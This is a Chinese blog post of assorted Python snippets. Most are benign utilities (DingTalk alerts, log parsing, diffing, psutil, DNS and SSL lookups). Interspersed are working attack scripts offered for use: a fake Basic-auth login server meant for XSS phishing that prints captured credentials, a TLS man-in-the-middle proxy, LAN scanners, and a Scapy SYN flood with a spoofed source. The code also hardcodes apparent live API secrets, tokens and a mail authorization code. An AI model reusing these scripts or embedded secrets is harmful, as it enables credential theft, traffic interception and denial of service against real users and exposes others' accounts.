前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Python 其他通用代码总结

Python 其他通用代码总结

作者头像
微软技术分享
发布2022-12-28 13:17:45
6230
发布2022-12-28 13:17:45
举报
文章被收录于专栏:Python 编程技术实践

封装钉钉通知接口: 接口的调用需要传入需要通知特定人的手机号,调用后会在顶顶群内通知.

代码语言:javascript
复制
import requests
import urllib.parse
import time,hmac,hashlib,base64,json

class DingToken():
    def __init__(self,atAll,atMobiles):
        self.atAll = atAll
        self.atMobiles = atMobiles

    def send_message(self,message):
        timestamp = str(round(time.time() * 1000))
        secret = 'SEC1018485caf7339e38530b4923ef3cfa164d03af6a79105af0013246048479bf1'
        secret_enc = secret.encode('utf-8')
        string_to_sign = '{}\n{}'.format(timestamp, secret)
        string_to_sign_enc = string_to_sign.encode('utf-8')
        hmac_code = hmac.new(secret_enc, string_to_sign_enc, digestmod=hashlib.sha256).digest()
        sign = urllib.parse.quote(base64.b64encode(hmac_code))

        headers={'Content-Type': 'application/json'}
        webhook = 'https://oapi.dingtalk.com/robot/send?access_token=0fe10f5f4e8dd74e6b90afb2f74b2b8a8aaa3bf246dccfead9d7395a56fae586&timestamp=' + timestamp + "&sign=" + sign
        data = {
            "msgtype": "text",
            "text": {"content": message },
            "at": {
                "atMobiles": [ self.atMobiles ],
                "isAtAll": self.atAll
                }
            }
        requests.post(webhook, data=json.dumps(data), headers=headers)

    # 发送警告信息
    def send_warning(self,platform,address,send_date,message):
        self.send_message(
                    "------------------------------------------------------- \n"
                    "\t {0} \n"
                    "------------------------------------------------------- \n"
                    "系统地址: \t {1} \n"
                    "告警日期: \t {2} \n"
                    "------------------------------------------------------- \n"
                    "{3}"
                    "-------------------------------------------------------".
                        format(platform,address,send_date,message) )

if __name__ == "__main__":
    # 参数1是否为全员,参数二需要at的手机号
    ding = DingToken(False,"15646596977")
    ding.send_warning("总部客服(呼叫中心)","192.168.1.1","2021:01:01","hello lyshark \n")

计算范围时间戳: 编程实现在日志文件中提取出指定时间之内对应系统数据,用于通过时间戳定位时间区间.

代码语言:javascript
复制
import sys,os,time
import logging,datetime

def Write_Dictionaries(LogName,Dict):
    logging.basicConfig(level=logging.DEBUG,
                    format = "%(created)d --> %(levelname)s --> %(asctime)s --> %(message)s",
                    datefmt = "%Y-%m-%d %H:%M:%S",
                    filename = LogName,
                    filemode = "a+")
    logging.info(str(Dict))

def Read_Dictionaries(LogName,Start_Time,End_Time):
    find_time_stamp = []

    with open(LogName,"r",encoding="utf-8") as fp:
        start = int(time.mktime(time.strptime(Start_Time,"%Y-%m-%d %H:%M:%S")))
        end = int(time.mktime(time.strptime(End_Time,"%Y-%m-%d %H:%M:%S")))
        for item in fp:
            data = item.split(" --> ")
            if int(data[0]) >= start and int(data[0]) <= end:
                find_dict = eval(data[3].replace("\n",""))
                find_time_stamp.append(find_dict)
    return find_time_stamp

if __name__ == "__main__":
    for item in range(1,0):
        dic = {"Address": "192.168.1.1", "CPU": str(item), "MEM": str(item*10), "IO": str(item/2)}
        Write_Dictionaries("addr.log",dic)
        time.sleep(1)
        print("写入内容: {}".format(dic))

find_dict = Read_Dictionaries("addr.log","2020-03-19 16:10:43","2020-03-19 16:10:54")
for item in find_dict:
    print("IP地址: {} CPU负载: {}".format(item.get("Address"),item.get("CPU")))

两个文本差异比对: 使用Python内置的模块就可以完成两个文件的差异比对,最后生成html表格方便展示.

代码语言:javascript
复制
import difflib
import argparse
import sys

# 创建打开文件函数,并按换行符分割内容
def readfile(filename):
    try:
        with open(filename, 'r') as fileHandle:
            text = fileHandle.read().splitlines()
        return text
    except IOError as e:
        print("Read file Error:", e)
        sys.exit()

# 比较两个文件并输出到html文件中
def diff_file(filename1, filename2):
    text1_lines = readfile(filename1)
    text2_lines = readfile(filename2)
    d = difflib.HtmlDiff()
    # context=True时只显示差异的上下文,默认显示5行,由numlines参数控制,context=False显示全文,差异部分颜色高亮,默认为显示全文
    result = d.make_file(text1_lines, text2_lines, filename1, filename2, context=True)
    # 内容保存到result.html文件中
    with open('result.html', 'w') as resultfile:
        resultfile.write(result)
    # print(result)

if __name__ == '__main__':
    # 定义必须传入两个参数,使用格式-f1 filename1 -f2 filename
    parser = argparse.ArgumentParser(description="传入两个文件参数")
    parser.add_argument('-f1', action='store', dest='filename1', required=True)
    parser.add_argument('-f2', action='store', dest='filename2', required=True)
    given_args = parser.parse_args()
    filename1 = given_args.filename1
    filename2 = given_args.filename2
    diff_file(filename1, filename2)

计算指定网段IP数量: 例如输入网段192.168.1.1/100则计算出这个网段范围内的所有主机数.

代码语言:javascript
复制
import os

def CalculationIP(Addr_Count):
    ret = []
    try:
        IP_Start = str(Addr_Count.split("/")[0]).split(".")
        IP_Heads = str(IP_Start[0] + "." + IP_Start[1] + "." + IP_Start[2] +".")
        IP_Start_Range = int(Addr_Count.split(".")[3].split("/")[0])
        IP_End_Range = int(Addr_Count.split("/")[1])
        for item in range(IP_Start_Range,IP_End_Range+1):
            ret.append(IP_Heads+str(item))
        return ret
    except Exception:
        return 0

if __name__ == "__main__":
    ret = CalculationIP("192.168.1.1/100")

    for item in range(len(ret)):
        print("地址范围内的所有IP: {}".format(ret[item]))

使用PSutil库提取数据: 通过使用第三方工具库,提取出系统中的网络连接请求与进程线程的详细数据.

代码语言:javascript
复制
import psutil

# 获取到网卡的出口入口流量信息
def GetNetwork():
    network = psutil.net_io_counters(pernic=True,nowrap=True)
    for each in network.keys():
        print("[*] 网卡: %-35s 发送/接收字节: %s/%s 发送/接收包数量: %s/%s"
        %(each,network[each].bytes_sent,network[each].bytes_recv,
        network[each].packets_sent,network[each].packets_recv))
# 获取到当前电脑中的网络连接状态: tcp tcp4 tcp6 udp inet4 inet6
def GetNetworkLink():
    network = psutil.net_connections(kind="tcp")
    AllowData = []
    for each in network:
        src_addr,src_port = each.laddr.ip,each.laddr.port
        src_stats = each.status
        src_pid = each.pid
        if src_stats in ["ESTABLISHED","LISTEN"]:
            process = psutil.Process(src_pid)
            print("[+] IP地址: %15s:%-5s  PID: %5s  名称: %-10s"
            %(src_addr,src_port,src_pid,process.name()))
            AllowData.append([process.name(),src_port])
    return AllowData
# 遍历整个系统中所有进程PID并取出关键数据
def GetProcessID():
    for each in psutil.pids():
        p = psutil.Process(int(each))
        print("-" * 100)
        print("进程: %25s 线程数: %5s 内存利用率:%3s 进程创建时间: %-20s"
        %(p.name(),p.num_threads(),int(p.memory_percent()),p.create_time()))
        print("-" * 100)
        print("CPU时间信息: {}".format(p.cpu_times()))
        print("MEM内存信息: {}".format(p.memory_info()))
        print("进程IO读写参数: {}".format(p.io_counters()))
        print("进程对外SOCKET: {}".format(p.connections()))
        print("\r"*100)

简单实现密码登录验证: 在不使用数据库的情况下完成密码验证,密码的hash值对应的是123123

代码语言:javascript
复制
import os,time
import hashlib

db = [
    {"user":"admin","pass":"4297f44b13955235245b2497399d7a93","Flag":"0"},
    {"user":"guest","pass":"4297f44b13955235245b2497399d7a93","Flag":"0"},
    {"user":"lyshark","pass":"4297f44b13955235245b2497399d7a93","Flag":"0"}
]

def CheckUser(username,password):
    hash = hashlib.md5()
    for i in range(0,len(db)):
        if db[i].get("user") == username:
            if db[i].get("Flag") < "5":
                hash.update(bytes(password,encoding="utf-8"))
                if db[i].get("pass") == str(hash.hexdigest()):
                    db[i]['Flag'] = 0
                    return 1
                else:
                    db[i]['Flag'] = str(int(db[i]['Flag']) + 1)
                    return 0
            else:
                print("用户 {} 被永久限制登录".format(db[i].get("user")))
                return 0
    return 0

while(True):
    username = input("输入用户名: ")
    password = input("输入密码: ")
    ret= CheckUser(username,password)
    print("登录状态:",ret)

SQLite提取数据并绘图 通过使用matplotlib这个库函数,并提取出指定时间的数据记录,然后直接绘制曲线图.

代码语言:javascript
复制
import os,time,datetime
import sqlite3
import numpy as np
from matplotlib import pyplot as plt

def TimeIndex(db,table,start,ends):
    start_time = int(time.mktime(time.strptime(start,"%Y-%m-%d %H:%M:%S")))
    end_time = int(time.mktime(time.strptime(ends,"%Y-%m-%d %H:%M:%S")))
    conn = sqlite3.connect(db)
    cursor = conn.cursor()
    select = "select * from {} where time >= {} and time <= {}".format(table,start_time,end_time)
    return cursor.execute(select).fetchall()

def Display():
    temp = TimeIndex("data.db","lyshark","2019-12-12 14:28:00","2019-12-12 14:29:00")
    list = []
    for i in range(0,len(temp)):
        list.append(temp[i][1])
    plt.title("CPU Count")
    plt.plot(list, list)
    plt.show()
    
if __name__ == "__main__":
    Display()

将图片转为字符图片: 通过pillow图片处理库,对图片进行扫描,然后用特殊字符替换图片的每一个位,生成的字符图片.

代码语言:javascript
复制
from PIL import Image
import argparse

# 将256灰度平均映射到70个字符上
def get_char(r,g,b,alpha = 256):
    ascii_char = list("~!@#$%^&*()_+ ")
    if alpha == 0:
        return " "
    length = len(ascii_char)
    gray = int(0.2126 * r + 0.7152 * g + 0.0722 * b)
    unit = (256.0 + 1)/length
    return ascii_char[int(gray/unit)]

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("--file",dest="file",help="指定一个图片文件")
    parser.add_argument("--width",dest="width",type=int,default=50,help="指定图片宽度")
    parser.add_argument("--height",dest="height",type=int,default=25,help="指定图片高度")
    args = parser.parse_args()
    # 使用方式: pip install pillow | main.py --file=xxx.jpg
    if args.file != None:
        img = Image.open(args.file)
        img = img.resize((args.width,args.height), Image.NEAREST)
        txt = ""
        for row in range(args.height):
            for cow in range(args.width):
                txt += get_char(*img.getpixel((cow,row)))
            txt += "\n"
        print(txt)
    else:
        parser.print_help()

针对视频转为字符串: 通过opencv库实现对指定MP4文件替换为字符串格式,并播放出来.

代码语言:javascript
复制
# pip install opencv-python
import cv2,os,argparse

def PlayCharMP4(file_name,heigth,width):
    ascii_char = list("~!@#$%^&*()_+/-,.;:'{}[]=qwertyuiokjhgfd")
    char_len = len(ascii_char)
    vc = cv2.VideoCapture(file_name)       # 加载一个视频
    if vc.isOpened():                      # 判断是否正常打开
        rval,frame = vc.read()
    else:
        rval = False
    frame_count,outputList = 0,[]
    while rval:                                         # 循环读取视频帧  
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)  # 转化成灰度图
        gray = cv2.resize(gray,(width,heigth))          # 重置图片大小
        text = ""
        for pixel_line in gray:                         # 循环处理行
            for pixel in pixel_line:                    # 循环处理列
                text += ascii_char[int(pixel / 256 * char_len )]
            text += "\n"                                
        outputList.append(text)
        frame_count = frame_count + 1                           
        if frame_count % 100 == 0:
            print("处理视频: " + str(frame_count) + " 帧")
        rval, frame = vc.read()
    for frame in outputList:            # 读取处理后的每一帧         
        os.system("cls")                # 清屏
        print(frame)                    # 打印每一帧

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("--file",dest="file",help="指定一个MP4文件")
    args = parser.parse_args()
    if args.file != None:
        PlayCharMP4(args.file,30,80)
    else:
        parser.print_help()

调用百度翻译API: 调用百度翻译API完成翻译任务.

代码语言:javascript
复制
import requests
import string
import time
import hashlib
import json
 
api_url = "http://api.fanyi.baidu.com/api/trans/vip/translate"
my_appid = "20220303001108300"
cyber = "pZmk93BeezwigjmjkOYS"
lower_case = list(string.ascii_lowercase)
 
def requests_for_dst(word):
    #init salt and final_sign
    salt = str(time.time())[:10]
    final_sign = str(my_appid)+word+salt+cyber
    final_sign = hashlib.md5(final_sign.encode("utf-8")).hexdigest()
    #区别en,zh构造请求参数
    if list(word)[0] in lower_case:
        paramas = {
            'q':word,
            'from':'en',
            'to':'zh',
            'appid':'%s'%my_appid,
            'salt':'%s'%salt,
            'sign':'%s'%final_sign
            }
        my_url = api_url+'?appid='+str(my_appid)+'&q='+word+'&from='+'en'+'&to='+'zh'+'&salt='+salt+'&sign='+final_sign
    else:
        paramas = {
            'q':word,
            'from':'zh',
            'to':'en',
            'appid':'%s'%my_appid,
            'salt':'%s'%salt,
            'sign':'%s'%final_sign
            }
        my_url = api_url+'?appid='+str(my_appid)+'&q='+word+'&from='+'zh'+'&to='+'en'+'&salt='+salt+'&sign='+final_sign
    response = requests.get(api_url,params = paramas).content
    content = str(response,encoding = "utf-8")
    json_reads = json.loads(content)
    print(json_reads['trans_result'][0]['dst'])
 
while True:
    word = input("输入文本 -> ")
    requests_for_dst(word)

统计网站访问日志: 实现统计网站访问日志,并得到字典类型返回值.

代码语言:javascript
复制
import os,json

def Count_Flag_And_Flow(file):
    list = []
    flag = {}
    with open(file) as f:
        contexts = f.readlines()
    for line in contexts:
        it = line.split()[8]
        list.append(it)
    list_num = set(list)
    for item in list_num:
        num = list.count(item)
        flag[item] = num
    return flag

def Count_Flag_And_Type(file):
    list = []
    flag = {}
    with open(file) as f:
        contexts = f.readlines()
    for line in contexts:
        list.append( line.split()[12].replace("(","").replace(")",""))

    list_num = set(list)
    for item in list_num:
        num = list.count(item)
        flag[item] = num
    return flag

def Count_Time_And_Flow(file):
    times = {}  # key 保存当前时间信息
    flow = {}  # value 当前时间流量总和
    Count= 0   # 针对IP地址的计数器
    with open(file) as f:
        contexts = f.readlines()
    for line in contexts:
        if line.split()[9] != "-" and line.split()[9] != '"-"':
            size = line.split()[9]
        temp = line.split()[3]
        ip_attr = temp.split(":")[1] + ":" + temp.split(":")[2]
        Count = int(size) + Count
        if ip_attr in times.keys():
            flow[ip_attr] = flow[ip_attr] + int(size)
        else:
            times[ip_attr] = 1
            flow[ip_attr] = int(size)
    return flow

if __name__ =="__main__":
    Address = Count_Flag_And_Flow("d://access.log")
    print(Address)

    Types = Count_Flag_And_Type("d://access.log")
    print(Types)

    OutFlow = Count_Time_And_Flow("d://access.log")
    print(OutFlow)

SMTPlib发送邮件: 简单封装一个SMTP邮件发送功能,传值即可直接使用.

代码语言:javascript
复制
import smtplib
from email.mime.text import MIMEText

# 登录邮箱服务器
mail_host = 'smtp.qq.com'
mail_user = '1181506874@qq.com'
mail_pass = 'wrpmzkalqqvhhijc'

# 调用发信函数
def SendMail(sender_user,recivers_user,title,subject,is_ssl = False):
    # 邮件发送方邮箱地址
    sender = sender_user
    receivers = [recivers_user]

    # 设置email信息
    # message = MIMEText(subject,'plain','utf-8')
    message = MIMEText(subject, 'html', 'utf-8')
    message['Subject'] = title
    message['From'] = sender
    message['To'] = receivers[0]

    # 登录并发送邮件
    try:
        if is_ssl != True:
            smtpObj = smtplib.SMTP()
            smtpObj.connect(mail_host,25)
            smtpObj.login(mail_user,mail_pass)
        else:
            smtpObj = smtplib.SMTP()
            smtpObj.connect(mail_host, 25)
            smtpObj = smtplib.SMTP_SSL(mail_host)
            smtpObj.login(mail_user, mail_pass)
        # 发送
        smtpObj.sendmail(sender,receivers,message.as_string())
        smtpObj.quit()
        return True
    except smtplib.SMTPException as e:
        return False

if __name__ == "__main__":
    # sender_user   发送方邮箱
    # recivers_user 接收方邮箱
    # title         发送标题
    # subject       正文
    # is_ssl        是否开启SSL
    ref = SendMail("1181506874@qq.com","lysharks@163.com","Flask 邮箱验证码",
                   "<p>您本次的验证码是: 1Ae3 有效期10分钟. </p><br><br> "
                   "更多内容请访问: <a href='https://www.baidu.com'>www.baidu.com</a>",False)
    print(ref)

构建简易HTTPBasic认证: Basic认证是由web服务器提供的一种轻便的身份校验方式,此处实现的工具可用于XSS内嵌钓鱼.

代码语言:javascript
复制
import socketserver
import http.server

class RequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if str(self.headers).find('UserLogin=1') > 0:
            self.send_response(302)
            self.send_header('Location', 'https://account.cnblogs.com/signin')
            self.end_headers()
        else:
            if str(self.headers).find('Authorization: Basic ') > 0:
                self.send_response(302)
                self.send_header('Set-Cookie', 'UserLogin=1')
                self.send_header('Location', 'https://account.cnblogs.com/signin')
                print("------------------------------------------------------------")
                print(str(self.headers))
            else:
                self.send_response(401)
                self.send_header('Content-type', 'text/html; charset=UTF-8')
                self.send_header('WWW-Authenticate',
                                 'Basic realm="Session Out Of Date, Please Login again [account.cnblogs.com]"')
                self.end_headers()

httpd = socketserver.TCPServer(("0.0.0.0", 9999), RequestHandler)
httpd.serve_forever()

获取DNS证书时间: 通过使用SSL类我们可以直接对一个网站解析出其SSL证书信息.

代码语言:javascript
复制
import ssl,sys,socket

def GetSSL_DNS(hostname):
    host=str(hostname).rstrip().lstrip()
    try:
        ctx = ssl.create_default_context()
        sock = ctx.wrap_socket(socket.socket(), server_hostname=hostname)
        sock.settimeout(5)
        sock.connect((host, 443))
        crt = sock.getpeercert()
        print("组织单位: {}".format(crt["subject"][2][0][1]))
        print("通用名: {}".format(crt["issuer"][2][0][1]))
        print("序列号: {}".format(crt["serialNumber"]))
        print("起始时间: {} ".format(crt["notBefore"]))
        print("终止时间: {} ".format(crt["notAfter"]))
        print('-------- 针对域名 {} DNS的列表 --------'.format(hostname))
        for item in crt['subjectAltName']:
            print("DNS: {}".format(item[1]))
    except Exception:
        pass

if __name__ == "__main__":
    try:
        if sys.argv[1]:
            GetSSL_DNS(sys.argv[1])
    except Exception:
        print("[-] 请输入一个域名: baidu.com")
        pass

DNS模块查域名解析: 使用 DNS-Python 这个模块来查询特定的一个或一组域名的所有解析记录.

代码语言:javascript
复制
# pip install dnspython
import os
import dns.resolver
from collections import defaultdict

domain = "baidu.com"

A = dns.resolver.query(domain,"A")
for x in A.response.answer:
    for y in x.items:
        print("查询到A记录:{} ".format(y))
print("*"*50)

MX = dns.resolver.query(domain,"MX")
for x in MX:
    print("MX交换数值 {}  MX记录:{} ".format(x.preference,x.exchange))
print("*"*50)

NS = dns.resolver.query(domain,"NS")
for x in NS.response.answer:
    for y in x.items:
        print("NS名称服务:{} ".format(y.to_text()))
# -------------------------------------------------------------------------
hosts = ["baidu.com","weibo.com","sina.com"]
IP_List = defaultdict(list)

def query(hosts):
    for host in hosts:
        ip = dns.resolver.query(host,"A")
        for i in ip:
            IP_List[host].append(i)
    return IP_List

for i in query(hosts):
    print(i,IP_List[i])

解析HTTP服务状态: 通过调用pycurl模块对指定的Web服务器进行健康状态监测.

代码语言:javascript
复制
import pycurl,certifi
from io import BytesIO

headers = ['Accept:*/*','User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0']
def header_function(header_line):
    header_line = header_line.decode("utf-8")
    #print(header_line.split(":"))

class ex_response(object):
    def __init__(self,url):
        self.buffer = BytesIO()                      # 创建缓存对象
        self.c = pycurl.Curl()                       # 创建curl实例
        self.c.setopt(pycurl.URL,url)                # 设置资源路径
        self.c.setopt(pycurl.CAINFO,certifi.where()) # 设置指定证书验证包(http页面需要去掉本行)
        self.c.setopt(pycurl.WRITEDATA, self.buffer)
        self.c.setopt(pycurl.WRITEHEADER,self.buffer)
        self.c.setopt(self.c.HTTPHEADER,headers)              # 设置HTTP头
        self.c.setopt(pycurl.HEADERFUNCTION, header_function) # 调用外部函数
        
        try:
            self.c.perform()
        except Exception:
            self.buffer.close()
            self.c.close()

    def getinfo(self):
        h1 = self.c.getinfo(pycurl.HTTP_CODE)          # 状态码
        h2 = self.c.getinfo(pycurl.TOTAL_TIME)         # 传输结束总消耗时间
        h3 = self.c.getinfo(pycurl.NAMELOOKUP_TIME)    # DNS解析时间
        h4 = self.c.getinfo(pycurl.CONNECT_TIME)       # 建立连接时间
        h5 = self.c.getinfo(pycurl.PRETRANSFER_TIME)   # 建立连接到准备传输消耗时间
        h6 = self.c.getinfo(pycurl.STARTTRANSFER_TIME) # 从建立连接到传输开始消耗时间
        h7 = self.c.getinfo(pycurl.REDIRECT_TIME)      # 重定向消耗时间
        h8 = self.c.getinfo(pycurl.SIZE_UPLOAD)        # 上传数据包大小
        h9 = self.c.getinfo(pycurl.SIZE_DOWNLOAD)      # 下载数据包大小
        h10 = self.c.getinfo(pycurl.SPEED_DOWNLOAD)    # 平均下载速度
        h11 = self.c.getinfo(pycurl.SPEED_UPLOAD)      # 平均上传速度
        h12 = self.c.getinfo(pycurl.HEADER_SIZE)       # http头文件大小
        info ='''
            http状态码:%s
            传输结束总时间:%.2f ms
            DNS解析时间:%.2f ms
            建立连接时间:%.2f ms
            准备传输时间:%.2f ms
            传输开始时间:%.2f ms
            重定向时间:%.2f ms
            上传数据包大小:%d bytes/s
            下载数据包大小:%d bytes/s
            平均下载速度:%d bytes/s
            平均上传速度:%d bytes/s
            http头文件大小:%d byte
        ''' %(h1,h2*1000,h3*1000,h4*1000,h5*1000,h6*1000,h7*1000,h8,h9,h10,h11,h12)
        print(info)
        self.buffer.close()
        self.c.close()

if __name__ == "__main__":
    curl_respon = ex_response("https://www.baidu.com")
    curl_respon.getinfo()

模拟Proxy实现MITM: 假设已经获取server端和客户端的证书,此脚本可以伪造客户端和服务端,实现MITM的场景。

代码语言:javascript
复制
import socket
import ssl
import threading
import queue
import time

fromCliQueue = queue.Queue()
fromSrvQueue = queue.Queue()

sFlag = False
## Client -- proxyServer -- proxyClient -- Server

class proxyClient(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
        self.sock = None
 
        self.ssl_context = ssl.create_default_context(cafile='RootCA.pem')
        self.ssl_context.load_cert_chain("Client.pem", "Client.key")
        self.ssl_context.protocol = ssl.PROTOCOL_TLSv1_2
        self.ssl_context.check_hostname = False
 
    def run(self):
        global fromCliQueue
        global fromSrvQueue
        while True:
            #if mesg queue from client is not empty, send it to server and recv response
            if not fromCliQueue.empty():
                if self.sock is None:
                    self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
                    self.sock.connect(('127.0.0.1', 9999))
                else:
                    sdata = fromCliQueue.get()
                    print("[proxyClient]send to server: {}".format(sdata))
 
                    self.sock.send(sdata)
 
                    rdata = self.sock.recv(4096)
                    #解决recv总是收到空字符
                    if rdata != b'':
                        print("[proxyClient]recv from server: {}".format(rdata))
                        fromSrvQueue.put(rdata)
                        self.sslDetected(rdata)
 
    def sslDetected(self, data):
        if b'\x01\x00\x00\x00' in data:
            self.sock = self.ssl_context.wrap_socket(self.sock)
            print("[proxyClient]ssl neogotiation")
            return True
        else:
            return False

class proxyServer(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind(('127.0.0.1',8888))
        self.sock.listen(1)
 
        self.ssl_context = ssl.SSLContext()
        # self.ssl_context.verify_mode = ssl.CERT_REQUIRED
        self.ssl_context.load_verify_locations(cafile='RootCA.pem')
        # self.ssl_context.check_hostname = False
 
        # test this protocol with client's PROTOCOL_TLSv1_2
        self.ssl_context.protocol = ssl.PROTOCOL_TLS_SERVER
        self.ssl_context.load_cert_chain("Server.pem", "Server.key")

    def run(self):
        global fromSrvQueue
        global fromCliQueue
        self.proxySocket, addr = self.sock.accept()
        while self.proxySocket:
            rdata = self.proxySocket.recv(4096)
            if rdata != b'':
                print("[proxyServer]recv from client: {}".format(rdata))
                fromCliQueue.put(rdata)
            while True:
                if fromSrvQueue.empty():
                    time.sleep(1)
                    continue
                else:
                    sdata = fromSrvQueue.get()
                    print("[proxyServer]send to client: {}".format(sdata))
                    self.proxySocket.send(sdata)
                    self.sslDetected(sdata)
                    break;
 
    def sslDetected(self, data):
        if b'\x01\x00\x00\x00' in data:
            self.proxySocket = self.ssl_context.wrap_socket(self.proxySocket, server_side=True)
            print("[proxyClient]ssl neogotiation")
            return True
        else:
            return False

if __name__ == "__main__":
    proxyCli = proxyClient()
    proxyCli.daemon = True
    proxyCli.start()
 
    proxySrv = proxyServer()
    proxySrv.daemon = True
    proxySrv.start()
 
    proxySrv.join()

计算ICMP校验和: 校验和的目的是计算数据包完整性,防止数据包被非法损坏, 在ICMP数据包发送时,会自动计算校验和并将其设置到ICMP报文中,在目标设备收到后再次计算校验和,并与数据包中的校验和作比较,从而判断该ICMP包是否正常.

代码语言:javascript
复制
import os,sys

# 计算并返回校验和字段
def icmp_chesksum(message):
    # 获取传入的数据包长度
    length = len(message)

    # 将校验和计算总数全部增加到 sum_number_count 中.
    sum_number_count = 0

    # 判断数据包是否为偶数
    mold_taking = length % 2

    # 循环计算,每次取出2个字节,相加.
    for i in range(0, length - mold_taking, 2):
        # 将数据以每两个字节(十六进制)通过ord转十进制,第一字节在低位,第二个字节在高位
        sum_number_count += ord(message[i]) + (ord(message[i + 1]) << 8)

    # 传入的数据长度是奇数则执行,且把这个字节(8位)加到前面的结果
    if mold_taking:
        sum_number_count += ord(message[-1])

    # 将数据包中高于16位与低16位相加
    sum_number_count = (sum_number_count >> 16) + (sum_number_count & 0xffff)

    # 如果还有高于16位,将继续与低16位相加
    sum_number_count += (sum_number_count >> 16)

    # 对sum取反(返回十进制)
    answer = ~sum_number_count & 0xffff

    # 主机字节序转网络字节序
    answer = answer >> 8 | (answer << 8 & 0xff00)
    return answer

def get_check_sum():
    type = "\x08"                             # 8代表ICMP回显类型
    code = "\x00"                             # 此处必须为0
    checksum = "\x00\x00"                     # 设置校验和字段为空
    id = "\x00\x01"                           # 设置ICMP序号,默认是1
    sequece = "\x00\x01"                      # 执行序号
    body = "abcdefghijklmnopqrstuvwabcdefghi" # 发送正文内容

    # 封装为一个ICMP报文格式
    icmp_message = type + code + checksum + id + sequece + body

    # 计算并返回校验和
    ref = icmp_chesksum(icmp_message)
    return ref

if __name__ == "__main__":
    checksum = get_check_sum()
    print("十进制校验和: {:d}".format(checksum))

发送ICMP原始数据包: 接着就是来实现构建并发送socket.SOCK_RAW原始数据包,发送的实现细节与上方解包原理完全一致.

代码语言:javascript
复制
import socket,time

def raw_socket(dst_addr,imcp_packet):
    # 构建原始数据包,发送类型为ICMP协议
    rawsocket = socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.getprotobyname("icmp"))

    # 记录当前请求时间
    send_request_time = time.time()

    # 一次性发送出去,并等待返回的时间和套接字句柄
    rawsocket.sendto(imcp_packet,(dst_addr,80))
    return send_request_time,rawsocket,dst_addr

if __name__ == "__main__":
    send_request_time,rawsocket,dst_addr = raw_socket("8.141.58.64",bytes("hello lyshark",encoding="utf-8"))
    print("发送时间戳: {} --> 发送IP: {} --> 数据包句柄: {}".format(send_request_time,dst_addr,rawsocket))

寻找内网路由地址: 除了设置socket.SOCK_RAW原始数据包模式外,Python还可以设置socket.SOCK_STREAM数据流模式,使用该模式还可实现扫描内网分布主机情况.

例如: 通过本地网段计算出C段IP地址,然后调用Check方法扫描目标网段内是否存在80端口开放的主机.

代码语言:javascript
复制
import socket,threading

routers = []
lock = threading.Lock()

def search_router():
    all_thread = []
    local_ip = socket.gethostbyname_ex(socket.gethostname())[2]
    print("本地接口: " + str(local_ip))
    for ip in local_ip:
        for i in range(1, 255):
            array = ip.split('.')
            array[3] = str(i)
            addr = '.'.join(array)
            thread = threading.Thread(target=check, args=(addr,))
            thread.start()
            all_thread.append(thread)
    for item in all_thread:
        item.join()

def check(addr):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(1)
    result = sock.connect_ex((addr, 80))
    sock.close()
    if result == 0:
        lock.acquire()
        print("该网段路由器可能是: {}".format(addr))
        routers.append((addr, 80))
        lock.release()

if __name__ == "__main__":
    search_router()

Nmap 搜索网段主机并绘图: 首先电脑中必须安装Nmap,然后使用如下脚本统计内网主机数,并最后绘制饼图展示.

代码语言:javascript
复制
# pip install numpy matplotlib -i https://pypi.tuna.tsinghua.edu.cn/simple
import os,nmap,time
import numpy as np
from matplotlib.pylab import *

def ScanPort(addr):
    port =[]
    flag = {}
    dic = {"WebServer":0,"MySQL":0,"SSH":0,"MSSQL":0,"FTP":0,"Danger":0}
    Nmap = nmap.PortScanner()
    try:
        ret = Nmap.scan(hosts=addr,arguments="-PS")
        for item in Nmap.all_hosts():
            try:
                temp = list(ret["scan"][item]["tcp"].keys())
                print("[*] IP地址: %12s 开放端口: %s"%(item,temp))
                port.extend(temp)
            except Exception:
                pass
    except Exception:
        print("[-] Nmap 端口扫描异常,程序被迫终止.")
        exit(0)
    
    list_num = set(port)
    for item in list_num:
        num = int(port.count(item))
        flag[item] = num
    dic["WebServer"] = flag.get(80)
    dic["MySQL"] = flag.get(3306)
    dic["SSH"] = flag.get(22)
    dic["MSSQL"] = flag.get(1433)
    dic["FTP"] = flag.get(21)
    dic["Danger"] = flag.get(135) + flag.get(139) + flag.get(445)
    print("[+] 服务统计: {}".format(dic))
    mpl.rcParams["font.sans-serif"] = ["KaiTi"]
    label = list(dic.keys())
    fracs = list(dic.values())
    plt.axes(aspect=1)
    plt.pie(x=fracs,labels=label,autopct="%0d%%")
    plt.savefig("scan.png")

if __name__ == "__main__":
    ScanPort("192.168.1.0/24")

使用Scapy制造SYN洪泛攻击: 使用Scapy制造一些再有TCP协议层的IP数据包,让这些包TCP源端口不断地自增一,而目的TCP端口513不变。

代码语言:javascript
复制
#coding=utf-8
from scapy.all import *

def synFlood(src, tgt):
    # TCP源端口不断自增一,而目标端口513不变
    for sport in range(1024, 65535):
        IPlayer = IP(src=src, dst=tgt)
        TCPlayer = TCP(sport=sport, dport=513)
        pkt = IPlayer / TCPlayer
        send(pkt)

src = "192.168.220.132"
tgt = "192.168.220.128"
synFlood(src, tgt)
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2018-05-28,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
云服务器
